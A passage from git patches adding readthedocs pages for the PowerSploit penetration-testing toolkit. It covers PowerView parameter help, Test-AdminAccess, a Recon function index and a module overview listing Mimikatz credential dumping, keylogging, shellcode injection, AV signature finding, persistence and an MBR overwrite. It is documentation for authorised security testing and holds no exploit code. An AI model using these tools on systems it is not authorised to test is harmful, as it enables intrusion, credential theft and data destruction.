+Accept wildcard characters: False +``` + +### -XOR +Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values. + +```yaml +Type: Hashtable +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Clear +Specifies an array of object properties that will be cleared in the directory. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +{{Fill SecurityMasks Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ADObject + +Custom PSObject with translated AD object property fields, if -PassThru is enabled. + +PowerView.ADObject.Raw + +The raw DirectoryServices.SearchResult object, if -PassThru and -Raw are enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Test-AdminAccess.md b/docs/Recon/Test-AdminAccess.md new file mode 100755 index 0000000..84eab4e --- /dev/null +++ b/docs/Recon/Test-AdminAccess.md @@ -0,0 +1,101 @@ +# Test-AdminAccess + +## SYNOPSIS +Tests if the current user has administrative access to the local (or a remote) machine. + +Idea stolen from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" \' + 'Thomas McCarthy "smilingraccoon" \' + 'Royce Davis "r3dy" \' + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Test-AdminAccess [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will use the OpenSCManagerW Win32API call to establish +a handle to the remote host. +If this succeeds, the current user context +has local administrator acess to the target. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Test-AdminAccess -ComputerName sqlserver +``` + +Returns results indicating whether the current user has admin access to the 'sqlserver' host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainComputer | Test-AdminAccess +``` + +Returns what machines in the domain the current user has access to. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Test-AdminAccess -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to check for local admin access (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.AdminAccess + +A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether +the current user has local admin rights, along with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + -- cgit v1.2.3 From 9033f2f544785573f5924e6843d709193321c644 Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Mon, 12 Dec 2016 21:58:50 -0500 Subject: Another try at getting readthedocs.io working --- docs/Recon/index.md | 125 +++++++++++++++++++++++++ docs/index.md | 264 ++++++++++++++++++++++++++++++++++++++++++++++++++++ mkdocs.yml | 160 +++++++++++++++---------------- 3 files changed, 469 insertions(+), 80 deletions(-) create mode 100644 docs/Recon/index.md create mode 100644 docs/index.md (limited to 'docs/Recon') diff --git a/docs/Recon/index.md b/docs/Recon/index.md new file mode 100644 index 0000000..acc2627 --- /dev/null +++ b/docs/Recon/index.md @@ -0,0 +1,125 @@ +To install this module, drop the entire Recon folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. + +The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" +The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" + +To use the module, type `Import-Module Recon` + +To see the commands imported, type `Get-Command -Module Recon` + +For help on each individual command, Get-Help is your friend. + +Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. + + +## PowerView + +PowerView is a PowerShell tool to gain network situational awareness on +Windows domains. It contains a set of pure-PowerShell replacements for various +windows "net *" commands, which utilize PowerShell AD hooks and underlying +Win32 API functions to perform useful Windows domain functionality. + +It also implements various useful metafunctions, including some custom-written +user-hunting functions which will identify where on the network specific users +are logged into. It can also check which machines on the domain the current +user has local administrator access on. Several functions for the enumeration +and abuse of domain trusts also exist. See function descriptions for appropriate +usage and available options. For detailed output of underlying functionality, pass +the -Verbose or -Debug flags. + +For functions that enumerate multiple machines, pass the -Verbose flag to get a +progress status as each host is enumerated. Most of the "meta" functions accept +an array of hosts from the pipeline. + + +### Misc Functions: + Export-PowerViewCSV - thread-safe CSV append + Resolve-IPAddress - resolves a hostname to an IP + ConvertTo-SID - converts a given user/group name to a security identifier (SID) + Convert-ADName - converts object names between a variety of formats + ConvertFrom-UACValue - converts a UAC int value to human readable form + Add-RemoteConnection - pseudo "mounts" a connection to a remote path using the specified credential object + Remove-RemoteConnection - destroys a connection created by New-RemoteConnection + Invoke-UserImpersonation - creates a new "runas /netonly" type logon and impersonates the token + Invoke-RevertToSelf - reverts any token impersonation + Get-DomainSPNTicket - request the kerberos ticket for a specified service principal name (SPN) + Invoke-Kerberoast - requests service tickets for kerberoast-able accounts and returns extracted ticket hashes + Get-PathAcl - get the ACLs for a local/remote file path with optional group recursion + + +### Domain/LDAP Functions: + Get-DomainDNSZone - enumerates the Active Directory DNS zones for a given domain + Get-DomainDNSRecord - enumerates the Active Directory DNS records for a given zone + Get-Domain - returns the domain object for the current (or specified) domain + Get-DomainController - return the domain controllers for the current (or specified) domain + Get-Forest - returns the forest object for the current (or specified) forest + Get-ForestDomain - return all domains for the current (or specified) forest + Get-ForestGlobalCatalog - return all global catalogs for the current (or specified) forest + Find-DomainObjectPropertyOutlier- inds user/group/computer objects in AD that have 'outlier' properties set + Get-DomainUser - return all users or specific user objects in AD + New-DomainUser - creates a new domain user (assuming appropriate permissions) and returns the user object + Get-DomainUserEvent - enumerates account logon events (ID 4624) and Logon with explicit credential events + Get-DomainComputer - returns all computers or specific computer objects in AD + Get-DomainObject - returns all (or specified) domain objects in AD + Set-DomainObject - modifies a gven property for a specified active directory object + Get-DomainObjectAcl - returns the ACLs associated with a specific active directory object + Add-DomainObjectAcl - adds an ACL for a specific active directory object + Find-InterestingDomainAcl - finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects + Get-DomainOU - search for all organization units (OUs) or specific OU objects in AD + Get-DomainSite - search for all sites or specific site objects in AD + Get-DomainSubnet - search for all subnets or specific subnets objects in AD + Get-DomainSID - returns the SID for the current domain or the specified domain + Get-DomainGroup - return all groups or specific group objects in AD + New-DomainGroup - creates a new domain group (assuming appropriate permissions) and returns the group object + Get-DomainManagedSecurityGroup - returns all security groups in the current (or target) domain that have a manager set + Get-DomainGroupMember - return the members of a specific domain group + Add-DomainGroupMember - adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so + Get-DomainFileServer - returns a list of servers likely functioning as file servers + Get-DomainDFSShare - returns a list of all fault-tolerant distributed file systems for the current (or specified) domain + + +### GPO functions + + Get-DomainGPO - returns all GPOs or specific GPO objects in AD + Get-DomainGPOLocalGroup - returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences + Get-DomainGPOUserLocalGroupMapping - enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation + Get-DomainGPOComputerLocalGroupMapping - takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation + Get-DomainPolicy - returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller + + +### Computer Enumeration Functions + + Get-NetLocalGroup - enumerates the local groups on the local (or remote) machine + Get-NetLocalGroupMember - enumerates members of a specific local group on the local (or remote) machine + Get-NetShare - returns open shares on the local (or a remote) machine + Get-NetLoggedon - returns users logged on the local (or a remote) machine + Get-NetSession - returns session information for the local (or a remote) machine + Get-RegLoggedOn - returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys + Get-NetRDPSession - returns remote desktop/session information for the local (or a remote) machine + Test-AdminAccess - rests if the current user has administrative access to the local (or a remote) machine + Get-NetComputerSiteName - returns the AD site where the local (or a remote) machine resides + Get-WMIRegProxy - enumerates the proxy server and WPAD conents for the current user + Get-WMIRegLastLoggedOn - returns the last user who logged onto the local (or a remote) machine + Get-WMIRegCachedRDPConnection - returns information about RDP connections outgoing from the local (or remote) machine + Get-WMIRegMountedDrive - returns information about saved network mounted drives for the local (or remote) machine + Get-WMIProcess - returns a list of processes and their owners on the local or remote machine + Find-InterestingFile - searches for files on the given path that match a series of specified criteria + + +### Threaded 'Meta'-Functions + + Find-DomainUserLocation - finds domain machines where specific users are logged into + Find-DomainProcess - finds domain machines where specific processes are currently running + Find-DomainUserEvent - finds logon events on the current (or remote domain) for the specified users + Find-DomainShare - finds reachable shares on domain machines + Find-InterestingDomainShareFile - searches for files matching specific criteria on readable shares in the domain + Find-LocalAdminAccess - finds machines on the local domain where the current user has local administrator access + Find-DomainLocalGroupMember - enumerates the members of specified local group on machines in the domain + + +### Domain Trust Functions: + Get-DomainTrust - returns all domain trusts for the current domain or a specified domain + Get-ForestTrust - returns all forest trusts for the current forest or a specified forest + Get-DomainForeignUser - enumerates users who are in groups outside of the user's domain + Get-DomainForeignGroupMember - enumerates groups with users outside of the group's domain and returns each foreign member + Get-DomainTrustMapping - this function enumerates all trusts for the current domain and then enumerates all trusts for each domain it finds diff --git a/docs/index.md b/docs/index.md new file mode 100644 index 0000000..c348b9e --- /dev/null +++ b/docs/index.md @@ -0,0 +1,264 @@ +### PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: + +## CodeExecution + +**Execute code on a target machine.** + +#### `Invoke-DllInjection` + +Injects a Dll into the process ID of your choosing. + +#### `Invoke-ReflectivePEInjection` + +Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. + +#### `Invoke-Shellcode` + +Injects shellcode into the process ID of your choosing or within PowerShell locally. + +#### `Invoke-WmiCommand` + +Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel. + +## ScriptModification + +**Modify and/or prepare scripts for execution on a compromised machine.** + +#### `Out-EncodedCommand` + +Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. + +#### `Out-CompressedDll` + +Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. + +#### `Out-EncryptedScript` + +Encrypts text files/scripts. + +#### `Remove-Comments` + +Strips comments and extra whitespace from a script. + +## Persistence + +**Add persistence capabilities to a PowerShell script** + +#### `New-UserPersistenceOption` + +Configure user-level persistence options for the Add-Persistence function. + +#### `New-ElevatedPersistenceOption` + +Configure elevated persistence options for the Add-Persistence function. + +#### `Add-Persistence` + +Add persistence capabilities to a script. + +#### `Install-SSP` + +Installs a security support provider (SSP) dll. + +#### `Get-SecurityPackages` + +Enumerates all loaded security packages (SSPs). + +## AntivirusBypass + +**AV doesn't stand a chance against PowerShell!** + +#### `Find-AVSignature` + +Locates single Byte AV signatures utilizing the same method as DSplit from "class101". + +## Exfiltration + +**All your data belong to me!** + +#### `Invoke-TokenManipulation` + +Lists available logon tokens. Creates processes with other users logon tokens, and impersonates logon tokens in the current thread. + +#### `Invoke-CredentialInjection` + +Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon). + +#### `Invoke-NinjaCopy` + +Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures. + +#### `Invoke-Mimikatz` + +Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz. + +#### `Get-Keystrokes` + +Logs keys pressed, time and the active window. + +#### `Get-GPPPassword` + +Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. + +#### `Get-GPPAutologon` + +Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences. + +#### `Get-TimedScreenshot` + +A function that takes screenshots at a regular interval and saves them to a folder. + +#### `New-VolumeShadowCopy` + +Creates a new volume shadow copy. + +#### `Get-VolumeShadowCopy` + +Lists the device paths of all local volume shadow copies. + +#### `Mount-VolumeShadowCopy` + +Mounts a volume shadow copy. + +#### `Remove-VolumeShadowCopy` + +Deletes a volume shadow copy. + +#### `Get-VaultCredential` + +Displays Windows vault credential objects including cleartext web credentials. + +#### `Out-Minidump` + +Generates a full-memory minidump of a process. + +#### 'Get-MicrophoneAudio' + +Records audio from system microphone and saves to disk + +## Mayhem + +**Cause general mayhem with PowerShell.** + +#### `Set-MasterBootRecord` + +Proof of concept code that overwrites the master boot record with the + message of your choice. + +#### `Set-CriticalProcess` + +Causes your machine to blue screen upon exiting PowerShell. + +## Privesc + +**Tools to help with escalating privileges on a target.** + +#### `PowerUp` + +Clearing house of common privilege escalation checks, along with some weaponization vectors. + +## Recon + +**Tools to aid in the reconnaissance phase of a penetration test.** + +#### `Invoke-Portscan` + +Does a simple port scan using regular sockets, based (pretty) loosely on nmap. + +#### `Get-HttpStatus` + +Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file. + +#### `Invoke-ReverseDnsLookup` + +Scans an IP address range for DNS PTR records. + +#### `PowerView` + +PowerView is series of functions that performs network and Windows domain enumeration and exploitation. + +## Recon\Dictionaries + +**A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.** + +* admin.txt - +* generic.txt - +* sharepoint.txt - + +## License + +The PowerSploit project and all individual scripts are under the [BSD 3-Clause license](https://raw.github.com/mattifestation/PowerSploit/master/LICENSE) unless explicitly noted otherwise. + +## Usage + +Refer to the comment-based help in each individual script for detailed usage information. + +To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. + +The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" +The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" + +To use the module, type `Import-Module PowerSploit` + +To see the commands imported, type `Get-Command -Module PowerSploit` + +If you're running PowerShell v3 and you want to remove the annoying 'Do you really want to run scripts downloaded from the Internet' warning, once you've placed PowerSploit into your module path, run the following one-liner: +`$Env:PSModulePath.Split(';') | + % { if ( Test-Path (Join-Path $_ PowerSploit) ) + {Get-ChildItem $_ -Recurse | Unblock-File} }` + +For help on each individual command, Get-Help is your friend. + +Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. + +## Contribution Rules + +We need contributions! If you have a great idea for PowerSploit, we'd love to add it. New additions will require the following: + +* The script must adhere to the style guide. Any exceptions to the guide line would need an explicit, valid reason. +* The module manifest needs to be updated to reflect the new function being added. +* A brief description of the function should be added to this README.md +* Pester tests must accompany all new functions. See the Tests folder for examples but we are looking for tests that at least cover the basics by testing for expected/unexpected input/output and that the function exhibits desired functionality. Make sure the function is passing all tests (preferably in mutiple OSes) prior to submitting a pull request. Thanks! + +## Script Style Guide + +**For all contributors and future contributors to PowerSploit, I ask that you follow this style guide when writing your scripts/modules.** + +* Avoid Write-Host **at all costs**. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. You should output custom objects instead. For more information on creating custom objects, read these articles: + * + * + +* If you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on '-Verbose'. + +* Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license). + +* Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis. + +* I prefer that variable names be capitalized and be as descriptive as possible. + +* Provide logical spacing in between your code. Indent your code to make it more readable. + +* If you find yourself repeating code, write a function. + +* Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use 'Throw'. If you have an error that doesn't need to stop execution, use Write-Error. + +* If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Try to use the PSReflect module, if possible. + +* Do not use hardcoded paths. A script should be useable right out of the box. No one should have to modify the code unless they want to. + +* PowerShell v2 compatibility is highly desired. + +* Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I'm looking for something like the following: + * `[Parameter(Position = 0, Mandatory = $True)]` + +* Don't use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias. + +* Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break. + +* Don't go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader. + +* Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement. + +* Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters. + +* If a script creates complex custom objects, include a ps1xml file that will properly format the object's output. diff --git a/mkdocs.yml b/mkdocs.yml index 72f6598..0c04f6a 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -1,85 +1,85 @@ site_name: PowerSploit -repo_url: https://github.com/PowerShellMafia/PowerSploit/tree/dev +repo_url: https://github.com/PowerShellMafia/PowerSploit/ site_favicon: favicon.ico pages: -- Home: 'README.md' - - Recon : 'Recon/README.md' - - Export-PowerViewCSV: 'docs/Recon/Export-PowerViewCSV.md' - - Resolve-IPAddress: 'docs/Recon/Resolve-IPAddress.md' - - ConvertTo-SID: 'docs/Recon/ConvertTo-SID.md' - - ConvertFrom-SID: 'docs/Recon/ConvertFrom-SID.md' - - Convert-ADName: 'docs/Recon/Convert-ADName.md' - - ConvertFrom-UACValue: 'docs/Recon/ConvertFrom-UACValue.md' - - Add-RemoteConnection: 'docs/Recon/Add-RemoteConnection.md' - - Remove-RemoteConnection: 'docs/Recon/Remove-RemoteConnection.md' - - Invoke-UserImpersonation: 'docs/Recon/Invoke-UserImpersonation.md' - - Invoke-RevertToSelf: 'docs/Recon/Invoke-RevertToSelf.md' - - Get-DomainSPNTicket: 'docs/Recon/Get-DomainSPNTicket.md' - - Invoke-Kerberoast: 'docs/Recon/Invoke-Kerberoast.md' - - Get-PathAcl: 'docs/Recon/Get-PathAcl.md' - - Get-DomainDNSZone: 'docs/Recon/Get-DomainDNSZone.md' - - Get-DomainDNSRecord: 'docs/Recon/Get-DomainDNSRecord.md' - - Get-Domain: 'docs/Recon/Get-Domain.md' - - Get-DomainController: 'docs/Recon/Get-DomainController.md' - - Get-Forest: 'docs/Recon/Get-Forest.md' - - Get-ForestDomain: 'docs/Recon/Get-ForestDomain.md' - - Get-ForestGlobalCatalog: 'docs/Recon/Get-ForestGlobalCatalog.md' - - Find-DomainObjectPropertyOutlier: 'docs/Recon/Find-DomainObjectPropertyOutlier.md' - - Get-DomainUser: 'docs/Recon/Get-DomainUser.md' - - New-DomainUser: 'docs/Recon/New-DomainUser.md' - - Get-DomainUserEvent: 'docs/Recon/Get-DomainUserEvent.md' - - Get-DomainComputer: 'docs/Recon/Get-DomainComputer.md' - - Get-DomainObject: 'docs/Recon/Get-DomainObject.md' - - Set-DomainObject: 'docs/Recon/Set-DomainObject.md' - - Get-DomainObjectAcl: 'docs/Recon/Get-DomainObjectAcl.md' - - Add-DomainObjectAcl: 'docs/Recon/Add-DomainObjectAcl.md' - - Find-InterestingDomainAcl: 'docs/Recon/Find-InterestingDomainAcl.md' - - Get-DomainOU: 'docs/Recon/Get-DomainOU.md' - - Get-DomainSite: 'docs/Recon/Get-DomainSite.md' - - Get-DomainSubnet: 'docs/Recon/Get-DomainSubnet.md' - - Get-DomainSID: 'docs/Recon/Get-DomainSID.md' - - Get-DomainGroup: 'docs/Recon/Get-DomainGroup.md' - - New-DomainGroup: 'docs/Recon/New-DomainGroup.md' - - Get-DomainManagedSecurityGroup: 'docs/Recon/Get-DomainManagedSecurityGroup.md' - - Get-DomainGroupMember: 'docs/Recon/Get-DomainGroupMember.md' - - Add-DomainGroupMember: 'docs/Recon/Add-DomainGroupMember.md' - - Get-DomainFileServer: 'docs/Recon/Get-DomainFileServer.md' - - Get-DomainDFSShare: 'docs/Recon/Get-DomainDFSShare.md' - - Get-DomainGPO: 'docs/Recon/Get-DomainGPO.md' - - Get-DomainGPOLocalGroup: 'docs/Recon/Get-DomainGPOLocalGroup.md' - - Get-DomainGPOUserLocalGroupMapping: 'docs/Recon/Get-DomainGPOUserLocalGroupMapping.md' - - Get-DomainGPOComputerLocalGroupMapping: 'docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md' - - Get-DomainPolicy: 'docs/Recon/Get-DomainPolicy.md' - - Get-NetLocalGroup: 'docs/Recon/Get-NetLocalGroup.md' - - Get-NetLocalGroupMember: 'docs/Recon/Get-NetLocalGroupMember.md' - - Get-NetShare: 'docs/Recon/Get-NetShare.md' - - Get-NetLoggedon: 'docs/Recon/Get-NetLoggedon.md' - - Get-NetSession: 'docs/Recon/Get-NetSession.md' - - Get-RegLoggedOn: 'docs/Recon/Get-RegLoggedOn.md' - - Get-NetRDPSession: 'docs/Recon/Get-NetRDPSession.md' - - Test-AdminAccess: 'docs/Recon/Test-AdminAccess.md' - - Get-NetComputerSiteName: 'docs/Recon/Get-NetComputerSiteName.md' - - Get-WMIRegProxy: 'docs/Recon/Get-WMIRegProxy.md' - - Get-WMIRegLastLoggedOn: 'docs/Recon/Get-WMIRegLastLoggedOn.md' - - Get-WMIRegCachedRDPConnection: 'docs/Recon/Get-WMIRegCachedRDPConnection.md' - - Get-WMIRegMountedDrive: 'docs/Recon/Get-WMIRegMountedDrive.md' - - Get-WMIProcess: 'docs/Recon/Get-WMIProcess.md' - - Find-InterestingFile: 'docs/Recon/Find-InterestingFile.md' - - Find-DomainUserLocation: 'docs/Recon/Find-DomainUserLocation.md' - - Find-DomainProcess: 'docs/Recon/Find-DomainProcess.md' - - Find-DomainUserEvent: 'docs/Recon/Find-DomainUserEvent.md' - - Find-DomainShare: 'docs/Recon/Find-DomainShare.md' - - Find-InterestingDomainShareFile: 'docs/Recon/Find-InterestingDomainShareFile.md' - - Find-LocalAdminAccess: 'docs/Recon/Find-LocalAdminAccess.md' - - Find-DomainLocalGroupMember: 'docs/Recon/Find-DomainLocalGroupMember.md' - - Get-DomainTrust: 'docs/Recon/Get-DomainTrust.md' - - Get-ForestTrust: 'docs/Recon/Get-ForestTrust.md' - - Get-DomainForeignUser: 'docs/Recon/Get-DomainForeignUser.md' - - Get-DomainForeignGroupMember: 'docs/Recon/Get-DomainForeignGroupMember.md' - - Get-DomainTrustMapping: 'docs/Recon/Get-DomainTrustMapping.md' - - Get-ComputerDetails: 'docs/Recon/Get-ComputerDetails.md' - - Get-HttpStatus: 'docs/Recon/Get-HttpStatus.md' - - Invoke-Portscan: 'docs/Recon/Invoke-Portscan.md' - - Invoke-ReverseDnsLookup: 'docs/Recon/Invoke-ReverseDnsLookup.md' +- Home: 'index.md' + - Recon : 'Recon/index.md' + - Export-PowerViewCSV: 'Recon/Export-PowerViewCSV.md' + - Resolve-IPAddress: 'Recon/Resolve-IPAddress.md' + - ConvertTo-SID: 'Recon/ConvertTo-SID.md' + - ConvertFrom-SID: 'Recon/ConvertFrom-SID.md' + - Convert-ADName: 'Recon/Convert-ADName.md' + - ConvertFrom-UACValue: 'Recon/ConvertFrom-UACValue.md' + - Add-RemoteConnection: 'Recon/Add-RemoteConnection.md' + - Remove-RemoteConnection: 'Recon/Remove-RemoteConnection.md' + - Invoke-UserImpersonation: 'Recon/Invoke-UserImpersonation.md' + - Invoke-RevertToSelf: 'Recon/Invoke-RevertToSelf.md' + - Get-DomainSPNTicket: 'Recon/Get-DomainSPNTicket.md' + - Invoke-Kerberoast: 'Recon/Invoke-Kerberoast.md' + - Get-PathAcl: 'Recon/Get-PathAcl.md' + - Get-DomainDNSZone: 'Recon/Get-DomainDNSZone.md' + - Get-DomainDNSRecord: 'Recon/Get-DomainDNSRecord.md' + - Get-Domain: 'Recon/Get-Domain.md' + - Get-DomainController: 'Recon/Get-DomainController.md' + - Get-Forest: 'Recon/Get-Forest.md' + - Get-ForestDomain: 'Recon/Get-ForestDomain.md' + - Get-ForestGlobalCatalog: 'Recon/Get-ForestGlobalCatalog.md' + - Find-DomainObjectPropertyOutlier: 'Recon/Find-DomainObjectPropertyOutlier.md' + - Get-DomainUser: 'Recon/Get-DomainUser.md' + - New-DomainUser: 'Recon/New-DomainUser.md' + - Get-DomainUserEvent: 'Recon/Get-DomainUserEvent.md' + - Get-DomainComputer: 'Recon/Get-DomainComputer.md' + - Get-DomainObject: 'Recon/Get-DomainObject.md' + - Set-DomainObject: 'Recon/Set-DomainObject.md' + - Get-DomainObjectAcl: 'Recon/Get-DomainObjectAcl.md' + - Add-DomainObjectAcl: 'Recon/Add-DomainObjectAcl.md' + - Find-InterestingDomainAcl: 'Recon/Find-InterestingDomainAcl.md' + - Get-DomainOU: 'Recon/Get-DomainOU.md' + - Get-DomainSite: 'Recon/Get-DomainSite.md' + - Get-DomainSubnet: 'Recon/Get-DomainSubnet.md' + - Get-DomainSID: 'Recon/Get-DomainSID.md' + - Get-DomainGroup: 'Recon/Get-DomainGroup.md' + - New-DomainGroup: 'Recon/New-DomainGroup.md' + - Get-DomainManagedSecurityGroup: 'Recon/Get-DomainManagedSecurityGroup.md' + - Get-DomainGroupMember: 'Recon/Get-DomainGroupMember.md' + - Add-DomainGroupMember: 'Recon/Add-DomainGroupMember.md' + - Get-DomainFileServer: 'Recon/Get-DomainFileServer.md' + - Get-DomainDFSShare: 'Recon/Get-DomainDFSShare.md' + - Get-DomainGPO: 'Recon/Get-DomainGPO.md' + - Get-DomainGPOLocalGroup: 'Recon/Get-DomainGPOLocalGroup.md' + - Get-DomainGPOUserLocalGroupMapping: 'Recon/Get-DomainGPOUserLocalGroupMapping.md' + - Get-DomainGPOComputerLocalGroupMapping: 'Recon/Get-DomainGPOComputerLocalGroupMapping.md' + - Get-DomainPolicy: 'Recon/Get-DomainPolicy.md' + - Get-NetLocalGroup: 'Recon/Get-NetLocalGroup.md' + - Get-NetLocalGroupMember: 'Recon/Get-NetLocalGroupMember.md' + - Get-NetShare: 'Recon/Get-NetShare.md' + - Get-NetLoggedon: 'Recon/Get-NetLoggedon.md' + - Get-NetSession: 'Recon/Get-NetSession.md' + - Get-RegLoggedOn: 'Recon/Get-RegLoggedOn.md' + - Get-NetRDPSession: 'Recon/Get-NetRDPSession.md' + - Test-AdminAccess: 'Recon/Test-AdminAccess.md' + - Get-NetComputerSiteName: 'Recon/Get-NetComputerSiteName.md' + - Get-WMIRegProxy: 'Recon/Get-WMIRegProxy.md' + - Get-WMIRegLastLoggedOn: 'Recon/Get-WMIRegLastLoggedOn.md' + - Get-WMIRegCachedRDPConnection: 'Recon/Get-WMIRegCachedRDPConnection.md' + - Get-WMIRegMountedDrive: 'Recon/Get-WMIRegMountedDrive.md' + - Get-WMIProcess: 